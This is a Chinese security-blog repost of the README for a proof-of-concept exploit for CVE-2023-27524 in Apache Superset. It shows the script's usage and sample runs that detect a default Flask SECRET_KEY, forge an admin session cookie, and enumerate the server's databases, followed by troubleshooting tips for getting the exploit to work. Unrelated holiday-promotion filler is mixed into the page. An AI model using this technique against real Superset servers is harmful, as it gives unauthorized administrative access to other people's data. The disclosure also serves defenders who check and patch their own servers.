CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置

admin 2023年4月26日15:18:33评论154 views字数 2223阅读7分24秒阅读模式

用于检查 Apache Superset 服务器是否使用不安全的默认配置运行的脚本 (CVE-2023-27524)。该脚本检查 Superset 服务器的会话 cookie 是否使用任何众所周知的默认 Flask SECRET_KEY 进行签名。

--validate标志可用于通过使用 Superset API 枚举数据库来验证可利用性。

博文

此处有更多详细信息:https: //www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset

用法

% python3 CVE-2023-27524.py -h                           usage: CVE-2023-27524.py [-h] --url URL [--id ID] [--validate] [--timeout TIMEOUT]
optional arguments: -h, --help show this help message and exit --url URL, -u URL Base URL of Superset instance --id ID User ID to forge session cookie for, default=1 --validate, -v Validate login --timeout TIMEOUT, -t TIMEOUT Time to wait before using forged session cookie, default=5s

基本示例

% python3 CVE-2023-27524.py -u http://10.0.220.200:8088   Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ekDecoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}Superset Version: 2.0.1Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg

可利用性证明示例

% python3 CVE-2023-27524.py -u http://10.0.220.200:8088 --validateGot session cookie: eyJjc3JmX3Rva2VuIjoiMTY0ZWExNWJlMDhmNWM2ZmZmOGFhNTExZThhMjUzYjM1YWY5MTdlNiIsImxvY2FsZSI6ImVuIn0.ZEc07w.CAkEJ7AtDlpfvVok-w0JQVcJqa0Decoded session cookie: {'csrf_token': '164ea15be08f5c6fff8aa511e8a253b35af917e6', 'locale': 'en'}Superset Version: 2.0.1Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc07w.fOAFW0_5gLUTkIbeR_5AqEz2DoUSleeping 5 seconds before using forged cookie to account for time drift...Got 302 on login, forged cookie appears to have been acceptedEnumerating databasesFound database examplesFound database PostgreSQLDone enumerating databases

故障排除

如果脚本检测到正在使用的 SECRET_KEY 但无法验证可利用性,可能是因为:

  • 目标服务器与 SSO 集成,用户 ID 不遵循自动递增格式(--id如果您知道,请尝试设置特定 user_id 的参数)

  • 尚未配置用户

  • 目标和您的机器之间的时间。Flask 会话 cookie 使用时间戳元素进行签名。尝试在代码中增加 5 秒的睡眠间隔。


项目地址:https://github.com/horizon3ai/CVE-2023-27524

CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置





CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置

CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置
(五一)夏季消费节
CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置
CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置
CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置

CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置

国际劳动节又称“五一国际劳动节”“国际示威游行日”(英语:International Workers' Day,May Day),是世界上80多个国家的全国性节日。定在每年的五月一日。它是全世界劳动人民共同拥有的节日" 夏日消费节 ",进一步促进消费,助力实体。

原文始发于微信公众号(Ots安全):CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月26日15:18:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置 https://cn-sec.com/archives/1692509.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: